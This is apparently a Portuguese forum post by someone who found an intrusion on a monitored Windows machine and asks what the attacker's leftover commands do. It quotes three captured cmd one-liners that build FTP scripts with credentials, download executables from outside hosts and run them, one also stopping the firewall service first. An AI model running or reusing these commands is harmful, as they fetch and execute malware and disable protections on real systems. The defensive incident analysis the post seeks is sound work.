saudações colaboradores do vol,
consegui detectar uma invasão em uma máquina da rede que ajudo a monitorar e peguei algumas linhas que o safado deixou no serviço de diretorios do outlook. gostaria de saber o que ele queria com esse script, alguem pode me ajudar!? por onde ele poder ter entrado?
mroot%system32cmd.execmd /c echo open 200.171.87.100 38705 >> ik &echo user niloz fucky0 >> ik &echo get 0.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &0.exe &exit
mroot%system32cmd.execmd /c net stop SharedAccess &echo open DivineFTP.snusk.nu 21 >> ij &echo user Gekko DSN654apoc >> ij &echo binary >> ij &echo get Gekko.exe >> ij &echo bye >> ij &ftp -n -v -s:ij &del ij &Gekko.exe &net start SharedAccess &exit
mroot%system32cmd.execmd /c echo open 200.171.101.47 27607 >> ik &echo user niloz fucky0 >> ik &echo get 9.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &9.exe &exit
LazyDocker – Interface de Usuário em Tempo Real para o Docker
Instalando COSMIC no Linux Mint
Turbinando o Linux Mint: o poder das Nemo Actions
Inteligência Artificial no desenvolvimento de software: quando começar a usar?
[Resolvido] Algo deu errado ao abrir seu perfil
Usando o VNSTAT para medir o seu consumo de internet
Habilitando clipboard manager no ambiente COSMIC
Quando vocês pararam de testar distros? (12)
Problema com som no laptop (5)
Não estou conseguindo fazer funcionar meu Postfix na versão 2.4 no Deb... (2)









